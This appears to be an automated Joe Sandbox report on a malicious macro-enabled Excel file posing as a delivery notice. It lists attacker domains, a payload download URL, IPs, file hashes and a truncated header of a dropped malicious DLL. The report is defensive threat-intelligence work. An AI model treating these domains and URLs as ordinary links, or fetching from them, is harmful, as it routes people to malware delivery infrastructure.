                                                                                                                                                                                  		voopeople.funUnited States
                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                  General Information

                                                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                                                  Analysis ID:444803
                                                                                                                                                                                  Start date:06.07.2021
                                                                                                                                                                                  Start time:17:42:30
                                                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                                                  Overall analysis duration:0h 7m 5s
                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                  Report type:full
                                                                                                                                                                                  Sample file name:Outfordelivery389402.xlsm
                                                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                                  Number of analysed new started processes analysed:6
                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                  Technologies:
                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                  • HDC enabled
                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                  Classification:mal100.troj.expl.evad.winXLSM@7/4@7/5
                                                                                                                                                                                  EGA Information:Failed
                                                                                                                                                                                  HDC Information:
                                                                                                                                                                                  • Successful, ratio: 70.6% (good quality ratio 56.6%)
                                                                                                                                                                                  • Quality average: 70.2%
                                                                                                                                                                                  • Quality standard deviation: 40%
                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                  • Successful, ratio: 77%
                                                                                                                                                                                  • Number of executed functions: 12
                                                                                                                                                                                  • Number of non-executed functions: 3
                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                  • Adjust boot time
                                                                                                                                                                                  • Enable AMSI
                                                                                                                                                                                  • Found application associated with file extension: .xlsm
                                                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                                                  • Scroll down
                                                                                                                                                                                  • Close Viewer
                                                                                                                                                                                  Warnings:
                                                                                                                                                                                  Show All
                                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/444803/sample/Outfordelivery389402.xlsm

                                                                                                                                                                                  Simulations

                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                  No simulations

                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                  IPs

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                  172.67.198.51LL52387-01-F4448869.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  13.224.92.73LL52387-01-F4448869.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    Schedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                            Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                              DeliveryConf535215.xlsmGet hashmaliciousBrowse

                                                                                                                                                                                                Domains

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                voopeople.funLL52387-01-F4448869.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                Schedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.12.122
                                                                                                                                                                                                uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.12.122
                                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                thousandsyears.downloadLL52387-01-F4448869.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                                Schedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.52.111
                                                                                                                                                                                                HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                                PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                                uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                                Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                                Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.52.111
                                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                                uppercilio.funLL52387-01-F4448869.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.55.83
                                                                                                                                                                                                Schedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.146.88
                                                                                                                                                                                                HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.146.88
                                                                                                                                                                                                PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.146.88
                                                                                                                                                                                                uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.55.83
                                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.55.83
                                                                                                                                                                                                Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.146.88
                                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.146.88
                                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.55.83
                                                                                                                                                                                                Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.146.88
                                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.55.83
                                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.55.83
                                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.55.83
                                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.55.83
                                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.55.83

                                                                                                                                                                                                ASN

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                CLOUDFLARENETUSPO No.179989 - H#U00f6rmann Mexico S.a.de C.v..exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.19.200
                                                                                                                                                                                                LL52387-01-F4448869.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                13076885-RFQ.docGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.19.200
                                                                                                                                                                                                Schedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                Cava.com_Fax-Message.htmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.16.18.94
                                                                                                                                                                                                VM52MC9YQDUO0P.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.16.18.94
                                                                                                                                                                                                PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.12.122
                                                                                                                                                                                                uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.12.122
                                                                                                                                                                                                runsys32.dllGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.20.185.68
                                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                                SMR8OzIgNB.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 104.21.8.151
                                                                                                                                                                                                AMAZON-02US3456_RFQ998778.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                • 52.58.78.16
                                                                                                                                                                                                LL52387-01-F4448869.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                Schedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                Enquiry#List For Order070621.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.59.53.244
                                                                                                                                                                                                PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 143.204.91.74
                                                                                                                                                                                                uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 143.204.91.74
                                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 143.204.91.74
                                                                                                                                                                                                Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 143.204.91.74
                                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.225.75.73
                                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.225.75.73
                                                                                                                                                                                                Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.225.75.73
                                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                Reciept 19129475.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                • 54.191.98.150
                                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 143.204.4.74
                                                                                                                                                                                                GDTGz3GXCiNgYwtXT6qX3tY8eu8Mqj.msiGet hashmaliciousBrowse
                                                                                                                                                                                                • 18.231.168.212
                                                                                                                                                                                                39d0c1e7.msiGet hashmaliciousBrowse
                                                                                                                                                                                                • 3.143.159.48

                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                05af1f5ca1b87cc9cc9b25185115607dLL52387-01-F4448869.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                13076885-RFQ.docGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                Schedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                108020075.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                G-DECL G50 EURL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                1.docGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                                DECL G50 EURL!.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                • 13.224.92.73

                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlLL52387-01-F4448869.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                  Schedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                      PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                          Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                            Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                              List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                  Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                    sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                          DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            PI-210610.xlsmGet hashmaliciousBrowse

                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
                                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                                                              Entropy (8bit):4.963425128586394
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                                              MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                                              SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                                              SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                                              SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                              • Filename: LL52387-01-F4448869.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Schedule-982347-Y6844315.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: HRScheduleH3965005.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: PI-9823472110866.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: uhr908723097306.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Vac.list07-2021-6014910.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Vac.list07-20214862208.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: List-4527768.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: HRcontacts7752205.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Formtofill4184860.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: sbf0127365-7431059.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: PI-210610.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1E52D1C.png
                                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                              File Type:PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):174009
                                                                                                                                                                                                                              Entropy (8bit):7.967231122944825
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:4DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/XO:CRcGUlFzy4mpTHdrUc3/SsYASj
                                                                                                                                                                                                                              MD5:C0AF15BAE70AFFC4BE7625110AEEF09A
                                                                                                                                                                                                                              SHA1:AEF94E038F0538C812AAF9EF605F76AF2376A26D
                                                                                                                                                                                                                              SHA-256:D2F5852B2EF010150C0C8A980F25B715C6363A8C4454C711B9E9F2B2532F1657
                                                                                                                                                                                                                              SHA-512:131DECBB06F1CE1A049BBF25B49615320FB4DC6DF5D3DA8B44EAE455D6ACC8AE12981BC108431DCC01D21EABFE1A552581C508F57FD3FDB7D7B06B5346522B2B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                                                                              Preview: .PNG........IHDR...@...@.......~.....PLTE.....3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f........................(....tRNS...................................................................................................................................................................................
                                                                                                                                                                                                                              C:\Users\user\Desktop\~$Outfordelivery389402.xlsm
                                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):165
                                                                                                                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                                                                                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                                                                                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                                                                                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                                                                                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                                                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                              C:\Users\user\XTOWN.dll
                                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                                                              Entropy (8bit):4.963425128586394
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                                              MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                                              SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                                              SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                                              SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              File type:Microsoft Excel 2007+
                                                                                                                                                                                                                              Entropy (8bit):7.939406643356395
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                                                                                              • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                                                                                              File name:Outfordelivery389402.xlsm
                                                                                                                                                                                                                              File size:189905
                                                                                                                                                                                                                              MD5:acdff723834c2096a2b6cf764530a39d
                                                                                                                                                                                                                              SHA1:f73118a481aff1b466d3357ed80ad5dda7bdb082
